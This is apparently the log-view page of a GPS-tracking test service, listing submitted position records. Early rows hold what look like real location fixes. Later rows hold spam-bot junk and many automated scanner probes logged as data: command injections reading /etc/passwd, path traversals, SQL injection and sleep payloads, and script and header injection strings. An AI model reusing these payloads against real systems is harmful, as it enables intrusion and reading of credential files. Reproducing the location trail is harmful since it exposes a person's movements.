Big Brother GPS: View Test

Instructions View log Send data ...

CSV log file: /home/wstomv/bbg/positions-test.log

Filtering is ON: Invalid data records are not logged.

Unix timestamp conversion

Line Server
Time
Client
Time
Latitude Longitude Accuracy Altitude Provider Bearing Speed Battlevel Charging Secret Deviceid Subscriberid
1 2012-01-23 23:27:35Z 2012-01-23T23:27:33.875Z -25.363882 131.044922 804.0 0.0 network 0.0 0.0 99 1 Uluru (Ayers Rock)
2 2012-01-27 19:52:39Z 50 10 100 secret
3 2012-02-27 20:44:45Z 2012-02-27T20:44:45.00Z 51.46628747228533 5.46090530231595 15.0 100.0 gps 112.0 2.3769 87 0
4 2012-02-27 20:45:27Z 2012-02-27T20:45:27.00Z 51.46684444975108 5.460135340690613 15.0 100.0 gps 128.0 2.6271 87 0
5 2012-02-27 21:00:38Z 2012-02-27T21:00:39.14Z 51.4666105 5.4601502 25.0 0.0 network 0.0 0.0 86 0
6 2012-02-27 21:08:06Z 2012-02-27T21:08:06.00Z 51.46665749140084 5.4601469077169895 10.0 92.9000244140625 gps 136.0 0.5004 84 0
7 2012-02-27 21:23:24Z 2012-02-27T21:23:24.993Z 51.463848 5.4595733 922.0 0.0 network 0.0 0.0 81 0
8 2012-02-27 21:38:25Z 2012-02-27T21:38:25.171Z 51.4665968 5.4601276 25.0 0.0 network 0.0 0.0 78 0
9 2012-02-27 21:43:56Z 2012-02-27T21:43:56.817Z 51.4666102 5.4601502 25.0 0.0 network 0.0 0.0 78 0
10 2012-02-27 21:58:56Z 2012-02-27T21:58:57.478Z 51.4666067 5.4601105 26.0 0.0 network 0.0 0.0 75 0
11 2012-02-27 22:13:57Z 2012-02-27T22:13:57.478Z 51.4665678 5.4601116 24.0 0.0 network 0.0 0.0 71 0
12 2012-02-27 22:22:29Z 2012-02-27T22:22:29.00Z 51.4667969243601 5.4602741450071335 10.0 98.79998779296875 gps 223.0 3.44025 70 0
13 2012-02-28 06:49:30Z 2012-02-28T06:49:30.376Z 51.4666121 5.4601505 22.0 0.0 network 0.0 0.0 69 0
14 2012-02-28 07:04:27Z 2012-02-28T07:04:27.271Z 51.4665644 5.4601124 24.0 0.0 network 0.0 0.0 64 0
15 2012-02-28 07:19:27Z 2012-02-28T07:19:27.260Z 51.4666114 5.4601495 23.0 0.0 network 0.0 0.0 65 0
16 2012-02-28 07:34:28Z 2012-02-28T07:34:28.585Z 51.4666107 5.4601547 27.0 0.0 network 0.0 0.0 65 0
17 2012-02-28 07:49:17Z 2012-02-28T07:49:16.00Z 51.46667794324458 5.460060657933354 10.0 40.4000244140625 gps 33.0 1.6263 65 0
18 2012-02-28 08:04:10Z 2012-02-28T08:04:09.00Z 51.4668011572212 5.46026224270463 15.0 38.5999755859375 gps 316.0 2.2518 65 0
19 2012-02-28 08:19:09Z 2012-02-28T08:19:08.00Z 51.467161579057574 5.46022167429328 10.0 62.20001220703125 gps 176.0 1.5012001 65 0
20 2012-02-28 08:34:14Z 2012-02-28T08:34:13.00Z 51.46678120829165 5.460247406736016 15.0 62.20001220703125 gps 108.0 0.37530002 65 0
21 2012-02-28 08:39:24Z 2012-02-28T08:39:23.00Z 51.46668137982488 5.459853038191795 15.0 62.20001220703125 gps 195.0 3.3776999 65 0
22 2012-02-28 08:54:18Z 2012-02-28T08:54:17.00Z 51.466791979037225 5.459827221930027 10.0 62.0999755859375 gps 347.0 1.6263 65 0
23 2012-02-28 09:09:27Z 2012-02-28T09:09:26.00Z 51.46655699238181 5.460253190249205 15.0 40.9000244140625 gps 29.0 4.81635 65 0
24 2012-02-28 09:24:24Z 2012-02-28T09:24:24.00Z 51.46699486300349 5.460711680352688 15.0 42.5999755859375 gps 61.0 0.43785 65 0
25 2012-02-28 09:39:39Z 2012-02-28T09:39:39.401Z 51.4666097 5.4601496 27.0 0.0 network 0.0 0.0 60 0
26 2012-02-28 09:50:57Z 2012-02-28T09:50:56.907Z 51.4666097 5.4601496 27.0 0.0 network 0.0 0.0 57 0
27 2012-02-28 10:05:45Z 2012-02-28T10:05:43.00Z 51.46663892548531 5.45944232493639 15.0 105.5 gps 345.0 0.43785 56 0
28 2012-02-28 10:20:35Z 2012-02-28T10:20:35.00Z 51.466683726757765 5.459972145035863 10.0 80.29998779296875 gps 330.0 0.1251 56 0
29 2012-02-28 10:35:37Z 2012-02-28T10:35:37.00Z 51.46661051083356 5.459639383479953 10.0 92.5999755859375 gps 348.0 0.68805 56 0
30 2012-02-28 10:50:36Z 2012-02-28T10:50:35.00Z 51.46653415169567 5.460317227989435 10.0 27.4000244140625 gps 85.0 3.0024002 56 0
31 2012-02-28 11:05:37Z 2012-02-28T11:05:36.00Z 51.46650439593941 5.459807859733701 5.0 113.20001220703125 gps 112.0 0.56295 56 0
32 2012-02-28 11:20:37Z 2012-02-28T11:20:36.00Z 51.46658515557647 5.459566796198487 10.0 114.70001220703125 gps 285.0 1.251 56 0
33 2012-02-28 11:35:38Z 2012-02-28T11:35:36.00Z 51.466174526140094 5.459994273260236 10.0 88.70001220703125 gps 34.0 0.68805 56 0
34 2012-02-28 11:50:57Z 2012-02-28T11:50:56.922Z 51.4665908 5.460127 26.0 0.0 network 0.0 0.0 55 0
35 2012-02-28 12:05:34Z 2012-02-28T12:05:33.00Z 51.46686913445592 5.460077505558729 10.0 85.0999755859375 gps 181.0 0.68805 55 0
36 2012-02-28 12:20:57Z 2012-02-28T12:20:56.906Z 51.4665729 5.460111 27.0 0.0 network 0.0 0.0 52 0
37 2012-02-28 12:31:55Z 2012-02-28T12:31:54.478Z 51.4666593 5.4601277 32.0 0.0 network 0.0 0.0 52 0
38 2012-02-28 12:46:54Z 2012-02-28T12:46:54.484Z 51.4666121 5.4601505 22.0 0.0 network 0.0 0.0 49 0
39 2012-02-28 13:01:54Z 2012-02-28T13:01:54.469Z 51.4666114 5.4601495 23.0 0.0 network 0.0 0.0 45 0
40 2012-02-28 13:06:34Z 2012-02-28T13:06:34.489Z 51.4666372 5.4601332 27.0 0.0 network 0.0 0.0 44 0
41 2012-02-28 13:21:34Z 2012-02-28T13:21:34.77Z 51.466576 5.460118 24.0 0.0 network 0.0 0.0 40 0
42 2012-02-28 13:36:17Z 2012-02-28T13:36:16.00Z 51.46719401702285 5.460113966837525 20.0 76.4000244140625 gps 35.0 1.6888499 38 0
43 2012-02-28 13:45:46Z 2012-02-28T13:45:45.00Z 51.46660694852471 5.459983292967081 10.0 16.29998779296875 gps 199.0 0.56295 35 0
44 2012-02-28 14:00:51Z 2012-02-28T14:00:50.00Z 51.46666402928531 5.46036290936172 10.0 15.5999755859375 gps 235.0 0.31275 36 1
45 2012-02-28 14:15:55Z 2012-02-28T14:15:55.00Z 51.46693401038647 5.460716038942337 10.0 14.4000244140625 gps 251.0 0.68805 39 0
46 2012-02-28 14:30:48Z 2012-02-28T14:30:47.00Z 51.46664994768798 5.460124611854553 10.0 77.20001220703125 gps 173.0 0.43785 48 1
47 2012-02-28 14:45:52Z 2012-02-28T14:45:51.00Z 51.466657407581806 5.460407165810466 10.0 45.70001220703125 gps 91.0 0.43785 65 1
48 2012-02-28 15:00:51Z 2012-02-28T15:00:50.00Z 51.46745268255472 5.460193762555718 10.0 -0.600006103515625 gps 57.0 1.5012001 81 1
49 2012-02-28 15:15:56Z 2012-02-28T15:15:55.00Z 51.46681867539883 5.460304152220488 15.0 12.9000244140625 gps 171.0 3.2526 92 1
50 2012-02-28 15:30:51Z 2012-02-28T15:30:49.00Z 51.466224608011544 5.459927637130022 10.0 43.0 gps 176.0 1.56375 98 1
51 2012-02-28 15:45:50Z 2012-02-28T15:45:49.00Z 51.466289442032576 5.460194516927004 15.0 52.79998779296875 gps 338.0 0.8757 100 1
52 2012-02-28 16:01:09Z 2012-02-28T16:01:08.00Z 51.46672261878848 5.459665786474943 10.0 56.0999755859375 gps 247.0 1.06335 100 1
53 2012-02-28 16:15:51Z 2012-02-28T16:15:50.00Z 51.4664858719334 5.460125282406807 15.0 52.29998779296875 gps 82.0 1.56375 100 1
54 2012-02-28 16:30:48Z 2012-02-28T16:30:47.00Z 51.466731796972454 5.459979521110654 10.0 73.29998779296875 gps 158.0 0.5004 100 1
55 2012-02-28 16:39:23Z 2012-02-28T16:39:23.00Z 51.466555022634566 5.460318820551038 10.0 83.9000244140625 gps 219.0 0.75060004 100 1
56 2012-02-28 16:54:41Z 2012-02-28T16:54:41.330Z 51.4668323 5.4601299 30.0 0.0 network 0.0 0.0 100 1
57 2012-02-28 17:09:33Z 2012-02-28T17:09:33.00Z 51.46702985744923 5.460093095898628 10.0 81.20001220703125 gps 283.0 1.93905 100 1
58 2012-02-28 17:11:01Z 2012-02-28T17:11:00.00Z 51.466541276313365 5.459971642121673 10.0 76.0 gps 51.0 1.6888499 100 1
59 2012-02-28 17:25:57Z 2012-02-28T17:25:56.00Z 51.4664789987728 5.460343882441521 10.0 74.4000244140625 gps 320.0 0.43785 99 0
60 2012-02-28 17:41:05Z 2012-02-28T17:41:04.982Z 51.4666136 5.4601376 48.0 0.0 network 0.0 0.0 99 0
61 2012-02-28 17:50:34Z 2012-02-28T17:50:34.00Z 51.466418649069965 5.460363328456879 10.0 18.4000244140625 gps 346.0 1.1259 97 0 jeFf7742
62 2012-02-28 17:52:04Z 2012-02-28T17:52:04.00Z 51.466305535286665 5.4603981133550406 10.0 16.4000244140625 gps 165.0 2.31435 97 0 jeFf4472
63 2012-02-28 17:52:24Z 2012-02-28T17:52:24.00Z 51.46690836176276 5.460231816396117 5.0 105.5 gps 179.0 0.5004 97 0 jeFf4472
64 2012-02-28 18:07:03Z 2012-02-28T18:07:03.00Z 51.46630356553942 5.459886314347386 15.0 105.5 gps 99.0 1.06335 94 0 jeFf4472
65 2012-02-28 18:14:35Z 2012-02-28T18:14:35.00Z 51.46658318582922 5.460156546905637 10.0 54.0999755859375 gps 319.0 0.37530002 92 0 jeFf4472
66 2012-10-27 17:44:08Z WmKBkTslgnN biZEsCSizh SeKQfrsOUeEjqH http://enieemqhzmde.com/ pPTdJHrXBGcx 1071 mmfefg@ybrdka.com pOTDAhReWJW TEKLEHJwYiRqMd MguDCHILIz JjWvTmeXIeOP 44943 648923
67 2012-11-01 12:20:42Z 1221 1221 12 2121 12 2112 2121 2121 1212 2112 2121 12 12
68 2012-11-25 05:48:04Z 1 1 1 1 1 1 1 1 1 1 11
69 2012-12-07 12:12:11Z ASAS as 312 DAS SD ASDAS D2123 211 12312 312 12
70 2013-04-14 15:23:09Z 2:38pm 2 2 2 2 2 2 2 2 2 22 22 222
71 2013-06-16 03:37:19Z 13:33 130.00 15.00 5 3 net 150 3 70 0 abcdef 111 222
72 2013-06-16 04:01:35Z 15 16 17
73 2013-06-16 04:11:56Z 25 26 17
74 2013-06-27 00:22:27Z 1 1 1 4111111111111111 1 1 1 1 1 1 1 1 1
75 2013-07-09 14:49:53Z 15:55 156 654 321 2 56 1 321 32 1 32
76 2013-07-16 01:03:18Z -25.363882 131.044922 804.0
77 2013-09-07 20:56:28Z 10 20 100 xx
78 2014-02-24 05:25:12Z Oedgugzg uHJYRSrNOwoBXYfbUdN uvKLeQXEfBBgpSoHX http://simpaydayloans.co.uk/ nqnMRLuMzUCqrgz 44903 nsqdmkgg@mgpntnfn.com ynyEgxMtrewl eJwBfGyeLPlOWns khItsVvhQCJ VUemGslXLK 200598 493258
79 2014-03-18 18:55:52Z 22 14.35 -90.56 20
80 2014-04-10 04:50:32Z erwe wrw werwe r werw w we ewer we w ewre erw wrwer
81 2014-04-10 04:51:33Z ewrwer 123123123 4534345345 11 wrwe werew wrw wrwe wrwer 1 werwerwr 3523 23434
82 2014-04-10 04:52:33Z fs f sdf dfsdf f dsf df fdf f sdfd f df 34324
83 2014-04-10 04:55:20Z fs f sdf dfsdf f dsf df fdf f sdfd f df 34324
84 2014-04-10 08:39:31Z ewrwer 123123123 4534345345 11 wrwe werew wrw wrwe wrwer 1 werwerwr 3523 23434
85 2014-04-10 08:39:46Z ewrwer 123123123 4534345345 11 wrwe werew wrw wrwe wrwer 1 werwerwr 3523 23434
86 2014-04-10 08:40:05Z ewrwer 123123123 4534345345 11 wrwe werew wrw wrwe wrwer 1 werwerwr 3523 23434
87 2014-04-11 07:10:37Z dpjrnhwrth HkpCZnEvGrxWhJI nCUeWNlTTVInJ http://mmctktntnncg.com/ JAHlZpGcPZirTDGfao 57357 frwziz@axvili.com SsdyGTOHYYGVkhdp ZjEBjFIKaoDLkwjcwe VKbibJCmMlJCQlREDt tIXZMfTFWVlvdcbpg 28439 689610
88 2014-05-23 22:21:39Z horny NluhyIKgKdYzghEdE QipsjGZQNwXlk bwvKldtwcSjXpW wUwwrrihOAckChsS 359816 dNBmPmqWi TqJVoLMVMSkVwdtW twBhNdXi lEUqpVUYIckmqbYOH GjMlkjSiOCmbcirqy 1971 86423
89 2014-09-10 13:35:58Z azluue qmyabMHK IAZVcMRygwAp http://jrrqrjfuomjr.com/ xQwjZkkHcXNxNHf azluue ePzxBDKUVjYlfBH EWGkrVCn mbfbrXahtVKVZi wcagxvmewkrMcvFH SiCNMQRtVLPuyhjpS azluue azluue
90 2014-10-07 19:09:44Z matt UMWsIzHePI TkkiKrhMSYP gUnVksaStPEyxzAlZ LOlhMzqggGYYYbYjMWg 2619 YFSdlsVxfzrR jWikEUBgjdZgCcZe TKiCMzGgzyP WCdsEQSu qCCRiWJGVOlZ 14244 299998
91 2014-10-16 00:10:52Z john WokfRrrqDCvzQsT MLjVSbqVF uoDxwLCSG zAatbwBjQx 364281 YUXRkSdrIHzVCrrRCy lKNivilTfnRqY lSGGTPVNHgbECyscSx EuocDqsNRh TnqXHKbaYbb 241729 968977
92 2015-01-06 15:17:45Z gordon vlXJJWPoUpSvOqfbe nrOtoYCgQ xlJAyYaXSqKJGy glIGYdeDLmptDPm 874143 rFuVvlHbh cEGmXpALNelzLAmWjNN dhdYcRZFDRBUiEqP pHbzFnEqVbkPx QdczHIIkW 10565 2742
93 2015-01-11 16:00:47Z 1 1 1 4111111111111111 1 1 1 1 1 1 1 1 1
94 2015-01-12 11:04:33Z varlog WzVcuIYcuvlM zWibJaucjRq XbjfsLcHfahxc zQjPjMhVCvLc 2504 UuGufyWtXauT NboYLLoZbytaowh OYDvIbDfKZVyT DZIjsdFIBXJWqB yDAjgjEpoSaEvSXevjC 56221 63249
95 2015-04-06 02:05:31Z 43 -122 10
96 2015-04-30 22:13:24Z rodjer rFsKNvPMZcZGQwIKOvS flEGKmhRcMxGqAk kAYjuUSUyrDksdvEaKf xnKFtGJqgqTEXMd 54247 IZlUURkNN spgqSnJcxInQkGlQG LEQoPqTNeERzoNEpN EhldvYmbUFGCeCHYn dTnnMhvcqaNJJGoAi 380623 471301
97 2015-06-26 14:51:40Z -75 -45 3 98 network 99 23 34 1 secr mar
98 2015-08-09 05:50:21Z Bradley NtMqlqsIeJSoLRI huAfhQTohesY PdbUniSewnNw CjbqDKIrboZvXy 9036 vdAwleggn KJSZgcGzQmZKhiq WFptIYBI FmFzWctJRZOpbMonOeN OGIQQKgaQqrM 9316 137474
99 2015-08-11 05:57:41Z Bradley SeclXwHCUKJsb FnnEvzdPgRNSPYEf WxrjiVUAgk aAoOPsrLonqHj 539007 vpRdLFwzx ohBKBjJbxKCdzcBw taZaILGotBNoar IqqGElPkchQI dcfSaoXmCxZU 444768 9980
100 2015-08-12 12:18:43Z Bradley eVQJOOBntj CndrzEUCYPlXnL vvpsTYmqJQ cvwRZAAWFdiJ 7799 IWcTzeDQdeoy tOXtVkCkccKp dEWRPWiv klBmefIhwrhPV fSGJizLHGIA 9528 737450
101 2015-10-24 16:55:50Z Bradley kcNPElMisZwEhXWeR bPurastD fpvdKnlJLQCJgo NctCHvCHWxqoYahr 57919 GPaUcBfoUMApqIZ vexcDbueEGSw gdvyDoVJpdb sFIFGamcxjfPmOLt ZgTDCjeejFAHGgMiN 223914 468085
102 2015-10-26 16:40:51Z Bradley EXtxPokiLIzFGHZjwEo VIxnlEwANc ETKaAiArfM IonZiqDXzzlyYeCFObv 480993 OSpGMllxVAMsumU uuIIDckKULcor JbfGbCQaAqobSwyCvyk agZDFgqStt RzUQmXDMnwLQB 506098 14314
103 2016-02-06 23:34:33Z Mark MYHEypNZgDInfQtWEz cgXeYrnkUxsLZsQBgJl knMEMLjIumfbP HrjFRWDfuLpsTScHdGX 65228 qgZJXntKhAqaXfmNONz tEquVNPU oEzzXOsdmrPmvU KfGxUSfdRieo wOGpTBYzsyfOLmEatAe 634678 70433
104 2016-03-03 21:56:50Z pmPVURDt UgekVuEXTnLIqhLr YghBNOnRcO nrIukOQVkCaBUTigNI ZifnQdjYI pVctemFadZn VYjBoBeXpEXQs TYBXraNdKik XxcGFHcEWz AkdPkMXB nJyTbnrvDFmM CiLCrZlMdeYERmgg ONgrmvikIu
105 2017-01-09 00:20:42Z MhdqOySEE rctydTmaKONFS UCDLYJYVdfGFIHXd MBajuCdQ tNaiNLiVpkTOF QzvwIYzTnkJqQwwcmM tSvdJrXhQv cNwWmvLzcPOszYml jyMutaEXJAyQWdt qgcErUipKMjCIrWGGXy eehvpWTqqVm KhAJZtQXMvuswUbzy SXqNqQgZJ
106 2017-01-23 21:23:24Z 20160123 -33 -69 5 960 claro 0 5 90 1 1234 32132132 3233
107 2017-03-12 14:12:32Z 1 1 1 4111111111111111 1 1 1 1 1 1 1 1 1
108 2017-11-26 04:32:12Z -25 53391 -49 2792 1049
109 2017-11-26 04:33:21Z -25 53391 -49 2792 1049
110 2017-11-26 04:34:58Z -25.53391 -49.2792 1049
111 2017-12-08 12:59:37Z 1 1 1 4111111111111111 1 1 1 1 1 1 1 1 1
112 2017-12-08 13:46:18Z 1 1 1 response.write(9031316*9553710) 1 1 1 1 1 1 1 1 1
113 2017-12-08 13:46:18Z 1 1 1 4111111111111111 1 1 1 1 1 1 1 1 1
114 2017-12-08 13:46:18Z 1 1 1 4111111111111111 1 1 1 1 1 1 1 1 1
115 2017-12-08 13:46:18Z 1 1 1 '+response.write(9031316*9553710)+' 1 1 1 1 1 1 1 1 1
116 2017-12-08 13:46:18Z 1 1 1 -1 or 13=13 1 1 1 1 1 1 1 1 1
117 2017-12-08 13:46:18Z 1 1 1 "+response.write(9031316*9553710)+" 1 1 1 1 1 1 1 1 1
118 2017-12-08 13:46:18Z 1 1 1 &cat /etc/passwd& 1 1 1 1 1 1 1 1 1
119 2017-12-08 13:46:18Z 1 1 1 '&cat /etc/passwd&' 1 1 1 1 1 1 1 1 1
120 2017-12-08 13:46:18Z 1 1 1 -1 or 13=0 1 1 1 1 1 1 1 1 1
121 2017-12-08 13:46:18Z 1 1 1 4111111111111111 response.write(9888794*9466688) 1 1 1 1 1 1 1 1
122 2017-12-08 13:46:18Z 1 1 1
123 1 1 1 1 1 1 1 1 1
124 2017-12-08 13:46:18Z 1 1 1 "&cat /etc/passwd&" 1 1 1 1 1 1 1 1 1
125 2017-12-08 13:46:18Z 1 1 1 -1 or 13-11=2 1 1 1 1 1 1 1 1 1
126 2017-12-08 13:46:18Z 1 1 1 4111111111111111 '+response.write(9888794*9466688)+' 1 1 1 1 1 1 1 1
127 2017-12-08 13:46:18Z 1 1 1
128 1 1 1 1 1 1 1 1 1
129 2017-12-08 13:46:19Z 1 1 1
130
131 1 1 1 1 1 1 1 1 1
132 2017-12-08 13:46:19Z 1 1 1 `cat /etc/passwd` 1 1 1 1 1 1 1 1 1
133 2017-12-08 13:46:19Z 1 1 1 -1' or '98'='98 1 1 1 1 1 1 1 1 1
134 2017-12-08 13:46:19Z 1 1 1 SomeCustomInjectedHeader:injected_by_wvs 1 1 1 1 1 1 1 1 1
135 2017-12-08 13:46:19Z 1 1 1 ../../../../../../../../../../etc/passwd 1 1 1 1 1 1 1 1 1
136 2017-12-08 13:46:19Z 1 1 1 4111111111111111 "+response.write(9888794*9466688)+" 1 1 1 1 1 1 1 1
137 2017-12-08 13:46:19Z 1 1 1 -1' or '98'='0 1 1 1 1 1 1 1 1 1
138 2017-12-08 13:46:19Z 1 1 1 |cat /etc/passwd# 1 1 1 1 1 1 1 1 1
139 2017-12-08 13:46:19Z 1 1 1 4111111111111111
140 1 1 1 1 1 1 1 1
141 2017-12-08 13:46:19Z 1 1 1 -1' or '96'='96 1 1 1 1 1 1 1 1 1
142 2017-12-08 13:46:19Z 1 1 1 ..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg 1 1 1 1 1 1 1 1 1
143 2017-12-08 13:46:19Z 1 1 1 4111111111111111 1 1 1 1 response.write(9229228*9039912) 1 1 1 1
144 2017-12-08 13:46:19Z 1 1 1 '|'ld 1 1 1 1 1 1 1 1 1
145 2017-12-08 13:46:19Z 1 1 1 4111111111111111
146 1 1 1 1 1 1 1 1
147 2017-12-08 13:46:19Z 1 1 1 -1" or "48"="48 1 1 1 1 1 1 1 1 1
148 2017-12-08 13:46:19Z 1 1 1 "|"ld 1 1 1 1 1 1 1 1 1
149 2017-12-08 13:46:19Z 1 1 1 ../../../../../../../../../../etc/passwd.jpg 1 1 1 1 1 1 1 1 1
150 2017-12-08 13:46:19Z 1 1 1 4111111111111111 SomeCustomInjectedHeader:injected_by_wvs 1 1 1 1 1 1 1 1
151 2017-12-08 13:46:19Z 1 1 1 4111111111111111 1 1 1 1 '+response.write(9229228*9039912)+' 1 1 1 1
152 2017-12-08 13:46:19Z 1 1 1 Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n 1 1 1 1 1 1 1 1 1
153 2017-12-08 13:46:19Z 1 1 1 4111111111111111 1 1 1 1 1 1 1 1 1
154 2017-12-08 13:46:19Z 1 1 1 -1" or "48"="0 1 1 1 1 1 1 1 1 1
155 2017-12-08 13:46:19Z 1 1 1 ;cat /etc/passwd; 1 1 1 1 1 1 1 1 1
156 2017-12-08 13:46:19Z 1 1 1 4111111111111111 1 1 1 1
157 1 1 1 1
158 2017-12-08 13:46:19Z 1 1 1 4111111111111111 1 1 1 1 "+response.write(9229228*9039912)+" 1 1 1 1
159 2017-12-08 13:46:19Z 1 1 1 -1" or "46"="46 1 1 1 1 1 1 1 1 1
160 2017-12-08 13:46:19Z 1 1 1 ..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg 1 1 1 1 1 1 1 1 1
161 2017-12-08 13:46:19Z 1 1 1 4111111111111111 1 1 1 1
162 1 1 1 1
163 2017-12-08 13:46:19Z 1 1 1 ';cat /etc/passwd;' 1 1 1 1 1 1 1 1 1
164 2017-12-08 13:46:19Z 1 1 1 4111111111111111 and sleep(4) 1 1 1 1 1 1 1 1 1
165 2017-12-08 13:46:19Z 1 1 1 /../..//../..//../..//../..//../..//etc/passwd.jpg 1 1 1 1 1 1 1 1 1
166 2017-12-08 13:46:19Z 1 1 1 268435455 1 1 1 1 1 1 1 1 1
167 2017-12-08 13:46:19Z 1 1 1 ";cat /etc/passwd;" 1 1 1 1 1 1 1 1 1
168 2017-12-08 13:46:19Z 1 1 1 4111111111111111 1 1 response.write(9807045*9947296) 1 1 1 1 1 1
169 2017-12-08 13:46:19Z 1 1 1 4111111111111111 1 1 1 1 SomeCustomInjectedHeader:injected_by_wvs 1 1 1 1
170 2017-12-08 13:46:19Z 1 1 1 h 1 1 1 1 1 1 1 1 1
171 2017-12-08 13:46:19Z 1 1 1 .\\./.\\./.\\./.\\./.\\./.\\./etc/passwd 1 1 1 1 1 1 1 1 1
172 2017-12-08 13:46:19Z 1 1 1 ||cat /etc/passwd 1 1 1 1 1 1 1 1 1
173 2017-12-08 13:46:19Z 1 1 1 4111111111111111 or (sleep(4)+1) limit 1 -- 1 1 1 1 1 1 1 1 1
174 2017-12-08 13:46:19Z 1 1 1 .. 1 1 1 1 1 1 1 1 1
175 2017-12-08 13:46:19Z 1 1 1 4111111111111111 1 1 '+response.write(9807045*9947296)+' 1 1 1 1 1 1
176 2017-12-08 13:46:19Z 1 1 1 4111111111111111 1 1
177 1 1 1 1 1 1
178 2017-12-08 13:46:19Z 1 1 1 1e309 1 1 1 1 1 1 1 1 1
179 2017-12-08 13:46:19Z 1 1 1 4111111111111111 1 1 "+response.write(9807045*9947296)+" 1 1 1 1 1 1
180 2017-12-08 13:46:19Z 1 1 1 /etc/passwd 1 1 1 1 1 1 1 1 1
181 2017-12-08 13:46:19Z 1 1 1 4111111111111111 &cat /etc/passwd& 1 1 1 1 1 1 1 1
182 2017-12-08 13:46:19Z 1 1 1 4111111111111111' and sleep(4)=' 1 1 1 1 1 1 1 1 1
183 2017-12-08 13:46:19Z 1 1 1 '"\'\");|]*{
184 1 1 1 1 1 1 1 1 1
185 2017-12-08 13:46:19Z 1 1 1 4111111111111111 1 1 1 1 1 response.write(9730658*9133585) 1 1 1
186 2017-12-08 13:46:19Z 1 1 1 ../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd 1 1 1 1 1 1 1 1 1
187 2017-12-08 13:46:19Z 1 1 1 4111111111111111 1 1
188 1 1 1 1 1 1
189 2017-12-08 13:46:19Z 1 1 1 Array 1 1 1 1 1 1 1 1 1
190 2017-12-08 13:46:19Z 1 1 1 4111111111111111' and (sleep(4)+1) limit 1 -- 1 1 1 1 1 1 1 1 1
191 2017-12-08 13:46:19Z 1 1 1 4111111111111111 '&cat /etc/passwd&' 1 1 1 1 1 1 1 1
192 2017-12-08 13:46:20Z 1 1 1 ${100076+99801} 1 1 1 1 1 1 1 1 1
193 2017-12-08 13:46:20Z 1 1 1 4111111111111111 1 1 1 1 1 1 1 1 1
194 2017-12-08 13:46:20Z 1 1 1 ../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd 1 1 1 1 1 1 1 1 1
195 2017-12-08 13:46:20Z 1 1 1 4111111111111111 1 1 1 1 1 '+response.write(9730658*9133585)+' 1 1 1
196 2017-12-08 13:46:20Z 1 1 1 4111111111111111" and sleep(4)=" 1 1 1 1 1 1 1 1 1
197 2017-12-08 13:46:20Z 1 1 1 4111111111111111 1 1 SomeCustomInjectedHeader:injected_by_wvs 1 1 1 1 1 1
198 2017-12-08 13:46:20Z 1 1 1 4111111111111111 1 1 1 1 1 1 1 1
199 2017-12-08 13:46:20Z 1 1 1 4111111111111111 "&cat /etc/passwd&" 1 1 1 1 1 1 1 1
200 2017-12-08 13:46:20Z 1 1 1 4111111111111111' or (sleep(4)+1) limit 1 -- 1 1 1 1 1 1 1 1 1
201 2017-12-08 13:46:20Z 1 1 1 ................etc/passwd 1 1 1 1 1 1 1 1 1
202 2017-12-08 13:46:20Z 1 1 1 4111111111111111 ${100426+99909} 1 1 1 1 1 1 1 1
203 2017-12-08 13:46:20Z 1 1 1 4111111111111111 1 1 1 1 1 "+response.write(9730658*9133585)+" 1 1 1
204 2017-12-08 13:46:20Z 1 1 1 4111111111111111 268435455 1 1 1 1 1 1 1 1
205 2017-12-08 13:46:20Z 1 1 1 4111111111111111" or (sleep(4)+1) limit 1 -- 1 1 1 1 1 1 1 1 1
206 2017-12-08 13:46:20Z 1 1 1 4111111111111111
207
208 1 1 1 1 1 1 1 1
209 2017-12-08 13:46:20Z 1 1 1 4111111111111111 h 1 1 1 1 1 1 1 1
210 2017-12-08 13:46:20Z 1 1 1 4111111111111111 1 1 1 1 1
211 1 1 1
212 2017-12-08 13:46:20Z 1 1 1 4111111111111111 1 1 1 1 1 1 1 response.write(9294718*9241867) 1
213 2017-12-08 13:46:20Z 1 1 1 4111111111111111 1 1 1 1 ${100426+100092} 1 1 1 1
214 2017-12-08 13:46:20Z 1 1 1 invalid../../../../../../../../../../etc/passwd/././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././. 1 1 1 1 1 1 1 1 1
215 2017-12-08 13:46:20Z 1 1 1 4111111111111111 .. 1 1 1 1 1 1 1 1
